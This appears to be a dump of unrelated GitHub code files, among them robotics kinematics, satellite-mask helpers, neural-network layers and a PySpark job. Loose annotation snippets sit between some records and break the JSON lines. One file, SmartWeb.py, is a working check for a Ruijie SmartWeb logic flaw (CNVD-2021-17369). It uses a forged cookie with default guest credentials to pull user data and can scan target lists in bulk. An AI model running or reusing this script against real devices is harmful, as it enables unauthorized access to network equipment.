z3 = np.array(T03[0:3, 2]).astype(np.float64).squeeze(-1)\n o3 = np.array(T03[0:3, 3]).astype(np.float64).squeeze(-1)\n\n o4 = np.array(T04[0:3, 3]).astype(np.float64).squeeze(-1)\n\n J1 = np.zeros(6)\n # J1[0:3] = z0\n J2 = np.concatenate([np.cross(z1, o4 - o1), z1], 0)\n J3 = np.concatenate([np.cross(z2, o4 - o2), z2], 0)\n J4 = np.concatenate([np.cross(z3, o4 - o3), z3], 0)\n\n J = np.array([J1, J2, J3, J4]).T\n return J\n\n\nq = np.array([0.0, pi / 8, pi / 8 * 3, -pi / 2])\nT_list = forward(q)\nd = 0\nend_positions = []\n\nfig = plt.figure()\nax = fig.add_subplot(projection='3d')\n\ndt = 0.1\nfor i in np.arange(0, 5, dt):\n ax = fig.add_subplot(projection='3d')\n ax.set_xlim3d([0, 20.0])\n ax.set_xlabel('X')\n\n ax.set_ylim3d([0, 20.0])\n ax.set_ylabel('Y')\n\n ax.set_zlim3d([0, 20.0])\n ax.set_zlabel('Z')\n\n T_list = forward(q)\n J = Jacobian(T_list[0], T_list[1], T_list[2], 
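# The Jacobian assembled above stacks one 6-vector per joint. For a revolute
# joint i the standard geometric column is [z_{i-1} x (o_n - o_{i-1}); z_{i-1}],
# which is what the np.concatenate([np.cross(...), z], 0) lines compute.
# Sketch of a single column (assumed unit axis z_prev and origins o_prev, o_end):
import numpy as np

def revolute_column(z_prev, o_prev, o_end):
    return np.concatenate([np.cross(z_prev, o_end - o_prev), z_prev])

col = revolute_column(np.array([0., 0., 1.]),
                      np.array([0., 0., 0.]),
                      np.array([1., 0., 0.]))
# linear part is (0, 1, 0): rotating about z moves this end-effector along +y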
T_list[3])\n T = T_list[0] * T_list[1] * T_list[2] * T_list[3]\n\n dedt = np.array([0, 0, 1, 0, 0, 0]).astype(np.float)\n dqdt = np.linalg.lstsq(J, dedt)[0]\n print(q)\n\n q += dqdt * dt\n plot_arm(ax, T_list)\n\n end_positions.append(np.array([float(T[0, 3]), float(T[1, 3]), float(T[2, 3])]))\n np_end_pos = np.array(end_positions)\n ax.scatter(np_end_pos[:, 0], np_end_pos[:, 1], np_end_pos[:, 2])\n plt.pause(0.01)\n plt.clf()\nax = fig.add_subplot(projection='3d')\nax.set_xlim3d([0, 20.0])\nax.set_xlabel('X')\n\nax.set_ylim3d([0, 20.0])\nax.set_ylabel('Y')\n\nax.set_zlim3d([0, 20.0])\nax.set_zlabel('Z')\nnp_end_pos = np.array(end_positions)\nplot_arm(ax, T_list)\nax.scatter(np_end_pos[:, 0], np_end_pos[:, 1], np_end_pos[:, 2])\nplt.show()","repo_name":"balloon61/Manipulator-Trajectory-Tracking","sub_path":"inverse_kinematic.py","file_name":"inverse_kinematic.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36103399617","text":"import os\nimport sys\nimport gdal\nimport numpy as np\nimport math\nfrom py_snap_helpers import *\n\ndef get_slstr_nodata_mask(classif_flags):\n \n # 'unfilled_pixel': 128\n \n b1 = int(math.log(128, 2))\n b2 = b1\n \n return _capture_bits(classif_flags.astype(np.int64), b1, b2)\n\ndef get_slstr_confidence_mask(slstr_confidence, classif_flags):\n \n pixel_classif_flags = {'coastline': 1,\n 'cosmetic': 256,\n 'day': 1024,\n 'duplicate': 512,\n 'inland_water': 16,\n 'land': 8,\n 'ocean': 2,\n 'snow': 8192,\n 'spare': 64,\n 'summary_cloud': 16384,\n 'summary_pointing': 32768,\n 'sun_glint': 4096,\n 'tidal': 4,\n 'twilight': 2048,\n 'unfilled': 32}\n \n \n b1 = int(math.log(pixel_classif_flags[slstr_confidence], 2))\n b2 = b1\n \n return _capture_bits(classif_flags.astype(np.int64), b1, b2)\n\ndef get_slstr_mask(slstr_cloud, classif_flags):\n \n pixel_classif_flags = {'11_12_view_difference': 2048,\n '11_spatial_coherence': 64,\n '1_37_threshold': 2,\n '1_6_large_histogram': 8,\n '1_6_small_histogram': 4,\n '2_25_large_histogram': 32,\n '2_25_small_histogram': 16,\n '3_7_11_view_difference': 4096,\n 'fog_low_stratus': 1024,\n 'gross_cloud': 128,\n 'medium_high': 512,\n 'spare': 16384,\n 'thermal_histogram': 8192,\n 'thin_cirrus': 256,\n 'visible': 1}\n \n \n b1 = int(math.log(pixel_classif_flags[slstr_cloud], 2))\n b2 = b1\n \n return _capture_bits(classif_flags.astype(np.int64), b1, b2)\n\n\ndef _capture_bits(arr, b1, b2):\n \n width_int = int((b1 - b2 + 1) * \"1\", 2)\n \n return ((arr >> b2) & width_int).astype('uint8')\n\ndef export_s3(bands):\n\n ds = gdal.Open(bands[0])\n \n width = ds.RasterXSize\n height = ds.RasterYSize\n\n input_geotransform = ds.GetGeoTransform()\n input_georef = ds.GetProjectionRef()\n \n ds = None\n \n driver = gdal.GetDriverByName('GTiff')\n \n output = driver.Create('s3.tif', \n width, \n height, \n len(bands), \n gdal.GDT_Float32)\n\n output.SetGeoTransform(input_geotransform)\n output.SetProjection(input_georef)\n \n for index, band in enumerate(bands):\n print(band)\n temp_ds = gdal.Open(band) \n \n band_data = temp_ds.GetRasterBand(1).ReadAsArray()\n output.GetRasterBand(index+1).WriteArray(band_data)\n \n output.FlushCache()\n \n return True\n\ndef read_s3(bands):\n\n gdal.UseExceptions()\n \n stack = []\n \n for index, band in enumerate(bands):\n \n temp_ds = gdal.Open(band) \n \n if not temp_ds:\n raise ValueError()\n \n stack.append(temp_ds.GetRasterBand(1).ReadAsArray())\n \n return 
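# _capture_bits above isolates a bit field: shift right to drop the low bits,
# then AND with a width mask. For the single-bit flags used here (b1 == b2) it
# reduces to testing one bit. Worked example with the 'unfilled_pixel' flag
# (value 128, i.e. bit 7):
import numpy as np

flags = np.array([0, 128, 129, 255], dtype=np.int64)
bit = 7
print((flags >> bit) & 1)  # [0 1 1 1]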
np.dstack(stack)\n\n","repo_name":"ec-better/ewf-wfp-03-01-02","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34340209441","text":"import torch\nimport torch.nn as nn\n\n\nclass RMSNorm(nn.Module):\n \"\"\"An alternate to layer normalization, without mean centering and the learned bias [1]\n\n References\n ----------\n .. [1] Zhang, Biao, and Rico Sennrich. \"Root mean square layer normalization.\" Advances in Neural Information\n Processing Systems 32 (2019).\n \"\"\"\n\n def __init__(self, dim, eps=1e-8):\n super().__init__()\n self.scale = dim**-0.5\n self.eps = eps\n self.g = nn.Parameter(torch.ones(dim))\n\n def forward(self, x):\n norm = torch.norm(x, dim=-1, keepdim=True) * self.scale\n return x / norm.clamp(min=self.eps) * self.g\n\n\nclass LayerNormNoBias(nn.LayerNorm):\n def __init__(self, input_size, **kwargs):\n super().__init__(input_size, elementwise_affine=False, **kwargs)\n\n\nclass LayerNorm(nn.LayerNorm):\n def __init__(self, input_size, **kwargs) -> None:\n super().__init__(input_size, **kwargs)\n\n\nclass RINorm(nn.Module):\n def __init__(self, input_dim: int, eps=1e-5, affine=True):\n \"\"\"Reversible Instance Normalization based on [1]\n\n Parameters\n ----------\n input_dim\n The dimension of the input axis being normalized\n eps\n The epsilon value for numerical stability\n affine\n Whether to apply an affine transformation after normalization\n\n References\n ----------\n .. [1] Kim et al. \"Reversible Instance Normalization for Accurate Time-Series Forecasting against\n Distribution Shift\" International Conference on Learning Representations (2022)\n \"\"\"\n\n super().__init__()\n self.input_dim = input_dim\n self.eps = eps\n self.affine = affine\n\n if self.affine:\n self.affine_weight = nn.Parameter(torch.ones(self.input_dim))\n self.affine_bias = nn.Parameter(torch.zeros(self.input_dim))\n\n def forward(self, x: torch.Tensor):\n # at the beginning of `PLForecastingModule.forward()`, `x` has shape\n # (batch_size, input_chunk_length, n_targets).\n # select all dimensions except batch and input_dim (0, -1)\n # TL;DR: calculate mean and variance over all dimensions except batch and input_dim\n calc_dims = tuple(range(1, x.ndim - 1))\n\n self.mean = torch.mean(x, dim=calc_dims, keepdim=True).detach()\n self.stdev = torch.sqrt(\n torch.var(x, dim=calc_dims, keepdim=True, unbiased=False) + self.eps\n ).detach()\n\n x = x - self.mean\n x = x / self.stdev\n if self.affine:\n x = x * self.affine_weight\n x = x + self.affine_bias\n\n return x\n\n def inverse(self, x: torch.Tensor):\n # x is assumed to be the output of PLForecastingModule.forward(), and has shape\n # (batch_size, output_chunk_length, n_targets, nr_params). 
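# RMSNorm above rescales by the root-mean-square instead of mean-centering:
# y = g * x / (||x|| / sqrt(d)). Quick numeric sketch that each row of the
# normalized output has norm sqrt(d) (taking g = 1 and ignoring eps):
import torch

x = torch.randn(4, 16)
d = x.shape[-1]
y = x / (x.norm(dim=-1, keepdim=True) * d ** -0.5)
assert torch.allclose(y.norm(dim=-1), torch.full((4,), float(d) ** 0.5))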
we ha\n if self.affine:\n x = x - self.affine_bias.view(self.affine_bias.shape + (1,))\n x = x / (\n self.affine_weight.view(self.affine_weight.shape + (1,))\n + self.eps * self.eps\n )\n x = x * self.stdev.view(self.stdev.shape + (1,))\n x = x + self.mean.view(self.mean.shape + (1,))\n return x\n","repo_name":"unit8co/darts","sub_path":"darts/models/components/layer_norm_variants.py","file_name":"layer_norm_variants.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":6665,"dataset":"github-code","pt":"21"} +{"seq_id":"40490507077","text":"\"\"\"\nfordev.generators.pis_pasep\n---------------------------\n\"\"\"\n\nfrom fordev.core import fordev_request\n\nfrom fordev.filters import data_format\n\n\ndef pis_pasep(formatting: bool=True, data_only: bool=True) -> str:\n \"\"\"Gere o código do PIS/PASEP aleatório.\"\"\"\n\n resp = fordev_request(\n content_length=26,\n referer='gerador_de_pis_pasep',\n payload={\n 'acao': 'gerar_pis',\n 'pontuacao': 'S' if formatting else 'N'\n }\n )\n\n return data_format(data_only=data_only, data_dict=resp)\n","repo_name":"matheusfelipeog/fordev","sub_path":"fordev/generators/pis_pasep.py","file_name":"pis_pasep.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"pt","doc_type":"code","stars":32,"dataset":"github-code","pt":"21"} +{"seq_id":"10490486601","text":"#질병 입력받기\r\n\r\ndef doctor():\r\n A = {\"K20\":\"식도염\", \"K21\":\"위-식도역류병\",\"K22\":\"식도의 기타 질환\",\"K23*\":\"달리 분류된 질환에서의 식도의 장애\",\r\n \"K25\":\"위궤양\",\"K26\":\"십이지장궤양\",\"K27\":\"상세불명 부위의 소화성 궤양\",\"K28\":\"위공장궤양\",\r\n \"K29\": \"위염 및 십이지장염\",\"K30\":\"기능성 소화불량\",\"K31\":\"위 및 십이지장의 기타 질환\"}\r\n\r\n B = {}\r\n for i in range(5):\r\n name = input(\"환자명 입력\")\r\n B[name] = input(\"질병코드 입력. 
단, 동일 질병 2인 이상 입력\")\r\n\r\n\r\n P_NAME = input(\"환자 이름을 입력하세요\") #환자 이름 입력받기\r\n\r\n for key,value in B.items():\r\n if key == P_NAME:\r\n print(\"환자이름은 {}, 질병코드는 {}, 질병명은 {} 입니다\".format(P_NAME, value, A[value]))\r\n\r\n\r\n D_NUM2 = input(\"질병 코드를 입력하세요\") # 질병코드 입력받기\r\n for key,value in B.items():\r\n if value == D_NUM2:\r\n print(\"환자이름은 {}, 질병코드는 {}, 질병명은 {} 입니다\".format(key, D_NUM2, A[value]))\r\n\r\ndoctor()","repo_name":"charlie231/Python","sub_path":"Math!/Doctor_4.py","file_name":"Doctor_4.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20107570165","text":"#!/usr/bin/env python\n\nimport sys, os, re\nimport json\nimport datetime, iso8601\n\n# 날짜와 기본 경로를 에어플로우에서 main()으로 전달\ndef main(iso_date, base_path):\n APP_NAME = \"pyspark_task_one.py\"\n \n # SparkSession이 없다면 그 환경을 생성\n try:\n sc and spark\n except NameError as e:\n import findspark\n findspark.init()\n import pyspark\n import pyspark.sql\n \n sc = pyspark.SparkContext()\n spark = pyspark.sql.SparkSession(sc).builder.appName(APP_NAME).getOrCreate()\n\n # 오늘 날짜 가져오기\n today_dt = iso8601.parse_date(iso_date)\n rounded_today = today_dt.date()\n\n # 오늘 날짜 적재\n today_input_path = \"{}/ch02/data/example_name_titles_daily.json/{}\".format(\n base_path,\n rounded_today.isoformat()\n )\n\n # 데이터를 적재하고 계속 진행\n people_titles = spark.read.json(today_input_path)\n people_titles.show()\n \n # RDD로 Group by\n titles_by_name = people_titles.rdd.groupBy(lambda x: x[\"name\"])\n \n # 그룹키와 그룹화된 데이터를 받아서 다양한 직함을 마스터 직함으로 연결\n def concatenate_titles(people_titles):\n name = people_titles[0]\n title_records = people_titles[1]\n master_title = \"\"\n for title_record in sorted(title_records):\n title = title_record[\"title\"]\n master_title += \"{}, \".format(title)\n master_title = master_title[:-2]\n record = {\"name\": name, \"master_title\": master_title}\n return record\n \n people_with_contactenated_titles = titles_by_name.map(concatenate_titles)\n people_output_json = people_with_contactenated_titles.map(json.dumps)\n \n # 오늘의 출력 경로 가져오기\n today_output_path = \"{}/ch02/data/example_master_titles_daily.json/{}\".format(\n base_path,\n rounded_today.isoformat()\n )\n \n # 오늘의 출력 경로 쓰기/대체하기\n os.system(\"rm -rf {}\".format(today_output_path))\n people_output_json.saveAsTextFile(today_output_path)\n\nif __name__ == \"__main__\":\n main(sys.argv[1], sys.argv[2])\n","repo_name":"wikibook/agile-data-science","sub_path":"ch02/pyspark_task_one.py","file_name":"pyspark_task_one.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72627068533","text":"#!/usr/bin/env python\n# -*- conding:utf-8 -*-\n\nimport requests\nimport urllib3\nimport argparse\nimport sys\nurllib3.disable_warnings()\n\n\ndef title():\n print(\"\"\"\n 锐捷无线SmartWeb管理系统存在逻辑缺陷漏洞\n CNVD-2021-17369 \n use: python3 SmartWeb.py\n Author: Henry4E36\n \"\"\")\n\nclass information(object):\n def __init__(self, args):\n self.args = args\n self.url = args.url\n self.file = args.file\n\n def target_url(self):\n target_url = self.url + \"/web/xml/webuser-auth.xml\"\n # 请求头添加默认密码:guest/guest 信息。\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0\",\n \"Cookie\": \"login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302;auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest\"\n }\n try:\n res = requests.get(url=target_url, headers=headers, 
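# The PySpark job above groups title records by name and joins the sorted
# titles into one master string. The same transformation sketched in plain
# Python (itertools.groupby requires the records pre-sorted by the group key):
from itertools import groupby

records = [{'name': 'a', 'title': 'CTO'}, {'name': 'a', 'title': 'CEO'},
           {'name': 'b', 'title': 'Dev'}]
records.sort(key=lambda r: (r['name'], r['title']))
master = [{'name': k, 'master_title': ', '.join(r['title'] for r in g)}
          for k, g in groupby(records, key=lambda r: r['name'])]
print(master)  # [{'name': 'a', 'master_title': 'CEO, CTO'}, {'name': 'b', ...}]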
verify=False, timeout=5)\n if res.status_code == 200 and \"user\" in res.text:\n print(f\"\\033[31m[{chr(8730)}] 目标系统: {self.url} 存在逻辑缺陷问题!\")\n print(f\"[-] 响应为:{res.text}\")\n else:\n print(f\"[\\033[31mx\\033[0m] 目标系统: {self.url} 不存在逻辑缺陷问题!\")\n\n except Exception as e:\n print(\"[\\033[31X\\033[0m] 站点连接失败\")\n\n\n def file_url(self):\n with open(self.file, \"r\") as urls:\n for url in urls:\n url = url.strip()\n if url[:4] != \"http\":\n url = \"http://\" + url\n self.url = url.strip()\n information.target_url(self)\n\nif __name__ == \"__main__\":\n title()\n parser = argparse.ArgumentParser(description=\"锐捷无线 SmartWeb 管理系统逻辑缺陷漏洞\")\n parser.add_argument(\"-u\", \"--url\", type=str, metavar=\"url\", help=\"Target url eg:\\\"http://127.0.0.1\\\"\")\n parser.add_argument(\"-f\", \"--file\", metavar=\"file\", help=\"Targets in file eg:\\\"ip.txt\\\"\")\n args = parser.parse_args()\n if len(sys.argv) != 3:\n print(\n \"[-] 参数错误!\\neg1:>>>python3 SmartWeb.py -u http://127.0.0.1\\neg2:>>>python3 SmartWeb.py -f ip.txt\")\n elif args.url:\n information(args).target_url()\n elif args.file:\n information(args).file_url()\n\n","repo_name":"Henry4E36/SmartWeb","sub_path":"SmartWeb.py","file_name":"SmartWeb.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"31824131476","text":"import subprocess\nfrom subprocess import call\nimport tempfile\nimport sys\nimport datetime\nimport os\nimport gridfs\nimport json\nfrom subprocess import Popen\n\n\n\ndef convert_request(dbcol, sourceid, conv_req, tempdir):\n \"\"\"\n returns the conversion doc, and then also potentially advances\n the state machine. \n \n \"\"\"\n\n # find the conversion doc\n query = {'type' : 'conversion',\n 'source' : sourceid}\n query.update(conv_req)\n\n doc = dbcol.find_one(query)\n\n if doc == None:\n # start the process\n newdoc = query\n newdoc['state'] = 'pending'\n newdoc['start'] = datetime.datetime.utcnow()\n\n oid = dbcol.insert(newdoc)\n newdoc[\"_id\"] = oid\n conversion_start(dbcol.database, newdoc, tempdir)\n \n return newdoc\n \n else:\n # we found a single doc:\n \n if doc['state'] == 'done':\n return doc\n\n if doc['state'] == 'pending':\n donestate = conversion_check_done(dbcol.database, doc, tempdir)\n if donestate['done'] == False:\n # not done yet\n return doc\n elif donestate['done'] == True:\n # it's done, yay!\n doc['state'] = 'done'\n if donestate['error'] == None:\n # success\n gfs = gridfs.GridFS(dbcol.database)\n fid = gfs.new_file() # FIX content type?\n donefilename = donestate['filename']\n fid.write(file(donefilename, 'r').read())\n fid.close()\n doc['error'] = None\n doc['output'] = fid._id;\n dbcol.update({\"_id\": doc['_id']},\n doc, safe=True)\n \n conversion_cleanup(doc, tempdir)\n else:\n doc['error'] = donestate['error']\n dbcol.update({\"_id\": doc['_id']},\n doc, safe=True)\n conversion_cleanup(doc, tempdir)\n return doc\n\n \n\n# Conversion process does everything based off of the conversion id,\n# creating id.in, id.req, id.result, and id.out\n\n \ndef conversion_start(db, reqdoc, tempdir):\n \"\"\"\n db : db\n reqdoc : conversion document\n tempdir : where shit is goin' \n \"\"\"\n src_id = reqdoc['source']\n conv_id = reqdoc['_id']\n\n # write the source filename\n gfs = gridfs.GridFS(db)\n fid = gfs.get(src_id)\n\n img_filename = os.path.join(tempdir, str(conv_id) + \".in\")\n f = file(img_filename, 'w')\n f.write(fid.read())\n f.close()\n\n # write the request doc\n req_filename = 
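# The Cookie header above carries auth=Z3Vlc3Q6Z3Vlc3Q%3D, which is just the
# URL-encoded base64 of the default credentials "guest:guest". Quick check:
import base64
from urllib.parse import unquote

token = unquote('Z3Vlc3Q6Z3Vlc3Q%3D')
print(base64.b64decode(token))  # b'guest:guest'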
os.path.join(tempdir, str(conv_id) + \".req\")\n\n req_dict = {}\n for k, v in reqdoc.iteritems():\n if k == 'start':\n pass\n elif (k != '_id') and (k != 'source'):\n req_dict[k] = v\n \n f = file(req_filename, 'w')\n\n json.dump(req_dict, f)\n f.close()\n\n result_filename = os.path.join(tempdir, str(conv_id) + \".result\")\n out_filename = os.path.join(tempdir, str(conv_id) + \".out\")\n\n run_convert(img_filename, req_filename, result_filename, out_filename)\n \n \n\ndef conversion_check_done(dbcol, reqdoc, tempdir):\n \"\"\"\n dbcol : db collection\n oid : document id of this conversion\n tempdir : where shit is goin' \n\n returns:\n {'done' : True/false\n 'error' : None / yes\n 'filename' : output filename,\n 'donedate' : last modified date on file \n }\n \"\"\"\n\n conv_id = str(reqdoc['_id'])\n result_filename = os.path.join(tempdir, str(conv_id) + \".result\")\n out_filename = os.path.join(tempdir, str(conv_id) + \".out\")\n \n if os.path.exists(result_filename):\n # done!\n res = {'done' : True,\n 'error' : None}\n rd = json.load(file(result_filename, 'r'))\n if rd['status'] == 'error':\n res['error'] = {'stdout' : rd.get('stdout', \"\"),\n 'retcode' : rd.get('retcode', -1),\n 'reason' : rd.get('reason', \"\")}\n else:\n res['filename'] = out_filename\n res['donedate'] = os.path.getmtime(out_filename)\n \n return res\n \n else:\n return {'done' : False}\n \ndef conversion_cleanup(reqdoc, tempdir):\n \"\"\"\n Clean up any of the conversion detritus\n \"\"\"\n id = str(reqdoc['_id'])\n base = os.path.join(tempdir, str(id))\n for ext in ['in', 'req', 'result', 'out']:\n try:\n os.remove(base + \".\" + ext)\n except:\n pass\n\ndef run_convert(img_filename, req_filename, result_filename, out_filename):\n \"\"\"\n Actually perform the spawn, and then just leave it to do its thing\n\n\n \"\"\"\n \n p = Popen([\"python\", \"-m\", \"mementa.figure_convert_runner\",\n img_filename, req_filename, result_filename, out_filename])\n\n \n","repo_name":"mementa/mementa","sub_path":"mementa/figure.py","file_name":"figure.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"16477877762","text":"from matplotlib import pyplot as plt\r\nfrom matplotlib.ticker import MultipleLocator\r\n\r\ndef SHO_RK4(f1,f2,x0,y10,y20,h,n=100):\r\n# 'f1' - (dy1/dx) \r\n# 'f2' - (dy2/dx) or (d^2y1/dx^2)\r\n# 'x0' - independent variable - initial value\r\n# 'y10' - y1 - initial value\r\n# 'y20' - y2 - initial value\r\n# 'h' - step size of independent variable\r\n# 'n' - max iteration count\r\n \r\n res = [[x0,y10]]\r\n x = x0\r\n xn = x0\r\n y1 = y10\r\n y1n = y10\r\n y2 = y20\r\n y2n = y20\r\n\r\n for i in range(1,n):\r\n x = x0 + (i-1)*h\r\n k1y1 = h*eval(f1)\r\n k1y2 = h*eval(f2)\r\n x = x + h/2\r\n y1 = y1n + (k1y1/2)\r\n y2 = y2n + (k1y2/2)\r\n k2y1 = h*eval(f1)\r\n k2y2 = h*eval(f2)\r\n y1 = y1n + (k2y1/2)\r\n y2 = y2n + (k2y2/2)\r\n k3y1 = h*eval(f1)\r\n k3y2 = h*eval(f2)\r\n y1 = y1n + (k2y1/2)\r\n y2 = y2n + (k2y2/2)\r\n x = x + h/2\r\n k4y1 = h*eval(f1)\r\n k4y2 = h*eval(f2)\r\n y1n = y1n + (k1y1 + 2*k2y1 + 2*k3y1 + k4y1)/6\r\n y2n = y2n + (k1y2 + 2*k2y2 + 2*k3y2 + k4y2)/6\r\n \r\n res.append([])\r\n # res[i] = res[i-1] + (h/6)*(t1 + 4*t2 + t3)\r\n res[(len(res)-1)].append(x0 + i*h)\r\n res[(len(res)-1)].append(y1n)\r\n # res[(len(res)-1)].append(y2n)\r\n \r\n return(res)\r\n\r\n# file read module\r\nfin = open(r\"C:\\Main\\Study\\Sem 5\\P346 Computational Phy Lab\\Code\\Assgn6\\Q1 in.txt\", \"r+\")\r\ninp = 
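# The RK4 driver above eval()s the derivative strings read from "Q1 in.txt".
# A sketch of the same coupled step with plain callables instead (hypothetical
# signatures f1(x, y1, y2), f2(x, y1, y2)). Note: before k4, the loop above
# appears to advance with k2/2 where the classical scheme takes a full k3 step.
def rk4_step(f1, f2, x, y1, y2, h):
    k1a = h * f1(x, y1, y2)
    k1b = h * f2(x, y1, y2)
    k2a = h * f1(x + h/2, y1 + k1a/2, y2 + k1b/2)
    k2b = h * f2(x + h/2, y1 + k1a/2, y2 + k1b/2)
    k3a = h * f1(x + h/2, y1 + k2a/2, y2 + k2b/2)
    k3b = h * f2(x + h/2, y1 + k2a/2, y2 + k2b/2)
    k4a = h * f1(x + h, y1 + k3a, y2 + k3b)
    k4b = h * f2(x + h, y1 + k3a, y2 + k3b)
    return (y1 + (k1a + 2*k2a + 2*k3a + k4a) / 6,
            y2 + (k1b + 2*k2b + 2*k3b + k4b) / 6)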
fin.readlines()\r\nfor i in range(len(inp)-1): inp[i] = inp[i][:-1] #input functions\r\n\r\nfn = inp[0]\r\ngn = inp[1]\r\ns=30\r\n\r\na = SHO_RK4(fn,gn,0,2,-1,0.05,2000) \r\n\r\n#plotting\r\nx = []\r\ny = []\r\nfor i in range(len(a)):\r\n x.append(a[i][0])\r\n y.append(a[i][1])\r\n\r\nfig, ax = plt.subplots()\r\n# plt.plot(x,y)\r\nplt.scatter(x,y, marker='.', s=s)\r\nax.xaxis.set_major_locator(MultipleLocator(20))\r\nax.xaxis.set_major_formatter('{x:.0f}')\r\nplt.grid()\r\n# plt.legend(('\\u03BB','=0.2','\\u03C9','=1.2'),loc='upper right')\r\nplt.xlabel(\"Time (t)\")\r\nplt.ylabel(\"Position (y(t))\")\r\nplt.title(\"Forced-damped SHO (2*d\\N{SUPERSCRIPT TWO}y/dx\\N{SUPERSCRIPT TWO} + \\u03BB*dy/dt + 2*y = 2*cos(\\u03C9t)): RK4\")\r\nplt.savefig(\"Q1 \\u03BB=0.2, \\u03C9=1.2.png\")\r\n# plt.show()","repo_name":"Enigma811/P346","sub_path":"Assgn6/Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"104116841","text":"def solution(lottos, win_nums):\n tiers = {6:1, 5:2, 4:3, 3:4, 2:5, 1:6, 0:6}\n correct = 0\n zero = 0\n for num in lottos:\n if num in win_nums:\n correct += 1\n if num == 0:\n zero += 1\n answer = [tiers[correct+zero], tiers[correct]]\n return answer","repo_name":"hanjihun2000/coding-test-practice","sub_path":"programmers/python/77484.py","file_name":"77484.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70883700533","text":"\"\"\"Script for training and evaluating QA models.\n\nExample command to train the (medium-sized) baseline model on SQuAD\nwith a GPU, and write its predictions to an output file:\n\nUsage:\n python3 main.py \\\n --use_gpu \\\n --model \"baseline\" \\\n --model_path \"squad_model.pt\" \\\n --train_path \"datasets/squad_train.jsonl.gz\" \\\n --dev_path \"datasets/squad_dev.jsonl.gz\" \\\n --output_path \"squad_predictions.txt\" \\\n --hidden_dim 256 \\\n --bidirectional \\\n --do_train \\\n --do_test\n\nAuthor:\n Shrey Desai and Yasumasa Onoe\n\"\"\"\n\nimport argparse\nimport pprint\nimport json\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom tqdm import tqdm\n\nfrom data import QADataset, Tokenizer, Vocabulary\n\nfrom model import BaselineReader\nfrom utils import cuda, search_span_endpoints, unpack\n\n\n_TQDM_BAR_SIZE = 75\n_TQDM_LEAVE = False\n_TQDM_UNIT = ' batches'\n_TQDM_OPTIONS = {\n 'ncols': _TQDM_BAR_SIZE, 'leave': _TQDM_LEAVE, 'unit': _TQDM_UNIT\n}\n\n\nparser = argparse.ArgumentParser()\n\n# Training arguments.\nparser.add_argument('--device', type=int)\nparser.add_argument(\n '--use_gpu',\n action='store_true',\n help='whether to use GPU',\n)\nparser.add_argument(\n '--model',\n type=str,\n required=True,\n choices=['baseline'],\n help='which model to use',\n)\nparser.add_argument(\n '--model_path',\n type=str,\n required=True,\n help='path to load/save model checkpoints',\n)\nparser.add_argument(\n '--embedding_path',\n type=str,\n default='glove/glove.6B.300d.txt',\n help='GloVe embedding path',\n)\nparser.add_argument(\n '--train_path',\n type=str,\n required=True,\n help='training dataset path',\n)\nparser.add_argument(\n '--dev_path',\n type=str,\n required=True,\n help='dev dataset path',\n)\nparser.add_argument(\n '--max_context_length',\n type=int,\n default=384,\n help='maximum context length (do not 
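# Worked example for the lotto solution just above: with
# lottos = [44, 1, 0, 0, 31, 25] and win_nums = [31, 10, 45, 1, 6, 19],
# two numbers match (1 and 31) and two are erased zeros, so the best case is
# 4 matches (tier 3) and the worst is 2 matches (tier 5):
print(solution([44, 1, 0, 0, 31, 25], [31, 10, 45, 1, 6, 19]))  # [3, 5]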
change!)',\n)\nparser.add_argument(\n '--max_question_length',\n type=int,\n default=64,\n help='maximum question length (do not change!)',\n)\nparser.add_argument(\n '--output_path',\n type=str,\n required=False,\n help='predictions output path',\n)\nparser.add_argument(\n '--shuffle_examples',\n action='store_true',\n help='shuffle training example at the beginning of each epoch',\n)\n\n# Optimization arguments.\nparser.add_argument(\n '--epochs',\n type=int,\n default=10,\n help='number of training epochs',\n)\nparser.add_argument(\n '--batch_size',\n type=int,\n default=64,\n help='training and evaluation batch size',\n)\nparser.add_argument(\n '--learning_rate',\n type=float,\n default=1e-3,\n help='training learning rate',\n)\nparser.add_argument(\n '--weight_decay',\n type=float,\n default=0.,\n help='training weight decay',\n)\nparser.add_argument(\n '--grad_clip',\n type=float,\n default=0.5,\n help='gradient norm clipping value',\n)\nparser.add_argument(\n '--early_stop',\n type=int,\n default=3,\n help='number of epochs to wait until early stopping',\n)\nparser.add_argument(\n '--do_train',\n action='store_true',\n help='flag to enable training',\n)\nparser.add_argument(\n '--do_test',\n action='store_true',\n help='flag to enable testing',\n)\n\n# Model arguments.\nparser.add_argument(\n '--vocab_size',\n type=int,\n default=50000,\n help='vocabulary size (dynamically set, do not change!)',\n)\nparser.add_argument(\n '--embedding_dim',\n type=int,\n default=300,\n help='embedding dimension',\n)\nparser.add_argument(\n '--hidden_dim',\n type=int,\n default=256,\n help='hidden state dimension',\n)\nparser.add_argument(\n '--rnn_cell_type',\n choices=['lstm', 'gru'],\n default='lstm',\n help='Type of RNN cell',\n)\nparser.add_argument(\n '--bidirectional',\n action='store_true',\n help='use bidirectional 